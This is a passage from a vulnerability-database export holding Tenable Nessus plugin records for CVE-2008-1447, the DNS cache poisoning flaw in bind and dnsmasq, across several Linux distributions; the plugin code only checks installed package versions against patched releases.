value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000706.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dnsmasq-2.45-1.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:03:02", "description": "The transaction id and the UDP source port used for DNS queries by the\nbind nameserver were predicatable. Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : bind (bind-82)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind-chrootenv", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-libs", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind"], "id": "SUSE_11_0_BIND-080708.NASL", "href": "https://www.tenable.com/plugins/nessus/39920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update bind-82.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39920);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE Security Update : bind (bind-82)\");\n script_summary(english:\"Check for the bind-82 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The transaction id and the UDP source port used for DNS queries by the\nbind nameserver were predicatable. Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=396963\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-chrootenv-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-devel-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-libs-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"bind-utils-9.4.2-39.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.4.2-39.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-devel / bind-libs / bind-libs-32bit / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T10:52:23", "description": "The remote host is affected by the vulnerability described in GLSA-200807-08\n(BIND: Cache poisoning)\n\n Dan Kaminsky of IOActive has reported a weakness in the DNS protocol\n related to insufficient randomness of DNS transaction IDs and query\n source ports.\n \nImpact :\n\n An attacker could exploit this weakness to poison the cache of a\n recursive resolver and thus spoof DNS traffic, which could e.g. lead to\n the redirection of web or mail traffic to malicious sites.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2008-07-15T00:00:00", "title": "GLSA-200807-08 : BIND: Cache poisoning", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:bind"], "id": "GENTOO_GLSA-200807-08.NASL", "href": "https://www.tenable.com/plugins/nessus/33494", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200807-08.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33494);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"GLSA\", value:\"200807-08\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-200807-08 : BIND: Cache poisoning\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200807-08\n(BIND: Cache poisoning)\n\n Dan Kaminsky of IOActive has reported a weakness in the DNS protocol\n related to insufficient randomness of DNS transaction IDs and query\n source ports.\n \nImpact :\n\n An attacker could exploit this weakness to poison the cache of a\n recursive resolver and thus spoof DNS traffic, which could e.g. lead to\n the redirection of web or mail traffic to malicious sites.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200807-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All BIND users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/bind-9.4.2_p1'\n Note: In order to utilize the query port randomization to mitigate the\n weakness, you need to make sure that your network setup allows the DNS\n server to use random source ports for query and that you have not set a\n fixed query port via the 'query-source port' directive in the BIND\n configuration.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/bind\", unaffected:make_list(\"ge 9.4.2_p1\"), vulnerable:make_list(\"lt 9.4.2_p1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"BIND\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:43:31", "description": "This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)", "edition": 23, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:dnsmasq"], "id": "SUSE_DNSMASQ-5512.NASL", "href": "https://www.tenable.com/plugins/nessus/33895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dnsmasq-5512.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33895);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"openSUSE 10 Security Update : dnsmasq (dnsmasq-5512)\");\n script_summary(english:\"Check for the dnsmasq-5512 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of dnsmasq uses random UDP source ports and a random TRXID\nnow. (CVE-2008-1447)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dnsmasq-2.45-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T15:44:13", "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented\nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries\nand poison DNS caches. Among other things, this could lead to\nmisdirected email and web traffic.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-07-23T00:00:00", "title": "Ubuntu 8.04 LTS : dnsmasq vulnerability (USN-627-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:dnsmasq-base", "p-cpe:/a:canonical:ubuntu_linux:dnsmasq", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-627-1.NASL", "href": "https://www.tenable.com/plugins/nessus/33560", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-627-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33560);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"USN\", value:\"627-1\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Ubuntu 8.04 LTS : dnsmasq vulnerability (USN-627-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Kaminsky discovered weaknesses in the DNS protocol as implemented\nby Dnsmasq. A remote attacker could exploit this to spoof DNS entries\nand poison DNS caches. Among other things, this could lead to\nmisdirected email and web traffic.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/627-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq and / or dnsmasq-base packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/23\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dnsmasq\", pkgver:\"2.41-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dnsmasq-base\", pkgver:\"2.41-2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq / dnsmasq-base\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T09:10:22", "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, and -current to address a security\nproblem.", "edition": 25, "published": "2011-05-28T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2008-191-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2011-05-28T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.1", "p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2008-191-02.NASL", "href": "https://www.tenable.com/plugins/nessus/54869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2008-191-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54869);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"SSA\", value:\"2008-191-02\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2008-191-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, and -current to address a security\nproblem.\"\n );\n # http://www.isc.org/sw/bind/bind-security.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.isc.org/downloads/bind/bind-security.php\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96fdcaf5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) 